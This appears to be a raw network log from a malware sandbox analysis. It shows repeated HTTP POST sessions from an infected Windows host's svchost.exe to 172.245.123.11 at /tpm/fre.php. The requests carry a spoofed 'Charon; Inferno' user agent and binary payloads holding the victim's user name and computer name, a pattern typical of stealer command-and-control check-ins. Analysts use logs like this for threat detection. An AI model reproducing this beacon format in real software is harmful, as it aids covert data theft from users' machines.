Jan 7, 2025 11:02:58.569350958 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:58.574188948 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:59.073698997 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:58 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.5	50067	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:59.224350929 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:59.229111910 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:59.743603945 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:59 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.5	50068	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:59.895684958 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:59.900572062 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:03:00.408051014 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:00 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.5	50069	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:03:00.553661108 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:03:00.558516979 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:03:01.052876949 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:00 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.5	50070	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:03:01.207179070 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:03:01.212085009 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:03:01.734214067 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:01 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.5	50071	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:03:01.895044088 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:03:01.900649071 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:03:02.402343988 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:02 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.5	50072	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:03:02.670571089 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:03:02.675530910 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:03:03.187813044 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:03 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.5	50073	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:03:03.331244946 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:03:03.337291002 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:03:03.861639023 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:03 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.5	50074	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:03:04.008693933 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:03:04.013533115 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:03:04.532922983 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:04 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.5	50075	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:03:04.675008059 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:03:04.679877996 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:03:05.175579071 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:05 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.5	50076	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:03:05.314588070 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:03:05.319446087 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:03:05.821984053 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:05 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.5	50077	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:03:05.971131086 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:03:05.975970030 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:03:06.488594055 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:06 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.5	50078	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:03:06.635051012 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:03:06.639843941 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:03:07.160923958 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:07 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.5	50079	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:03:07.308068037 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:03:07.327650070 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:03:07.986324072 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:07 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.5	50080	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:03:08.127477884 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:03:08.132275105 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:03:08.655086040 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:08 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.5	50081	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:03:08.801397085 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:03:08.806380033 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:03:09.305763006 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:09 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.5	50082	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:03:09.455148935 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:03:09.459975958 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:03:09.979574919 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:09 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.5	50083	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:03:10.127399921 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:03:10.132210016 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:03:10.638492107 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:10 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.5	50084	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:03:10.783771992 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:03:10.788630009 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:03:11.312037945 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:11 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.5	50085	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:03:11.455241919 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:03:11.460088968 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:03:11.962011099 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:03:11 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.5	50086	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:03:12.122215986 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
